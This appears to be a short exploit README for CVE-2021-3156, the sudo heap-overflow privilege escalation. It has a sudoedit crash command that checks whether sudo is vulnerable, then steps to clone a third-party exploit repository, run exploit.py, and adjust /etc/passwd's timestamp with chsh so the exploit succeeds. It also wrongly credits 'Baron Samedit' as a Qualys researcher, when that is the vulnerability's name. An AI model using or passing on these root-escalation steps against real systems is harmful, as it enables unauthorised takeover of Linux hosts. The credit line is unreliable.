CVE-2021-3156 is a new severe vulnerability was found in Unix and Linux operating systems that allow an unprivileged user to exploit this vulnerability using Sudo, causing a heap overflow to elevate privileges to root without authentication, or even get listed in the sudoers file.
Credit to: Advisory by Baron Samedit of Qualys
The sudo project released a command that allows you to test whether your version of sudo is vulnerable:
sudoedit -s '\' `perl -e 'print "A" x 65536'`
If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable.
git clone https://github.com/CyberCommands/exploit-sudoedit.git sudoedit/
cd sudoedit/
sudo python3 exploit.py --help
- The modified time of /etc/passwd needs to be newer than the system boot time, if it isn't you can use
chsh
to update it. Unfortunately this means you will have to know the password for the account you are running as. Remember thatchsh
doesn't accept empty passwords by default so if it is empty you may have to set one withpasswd
.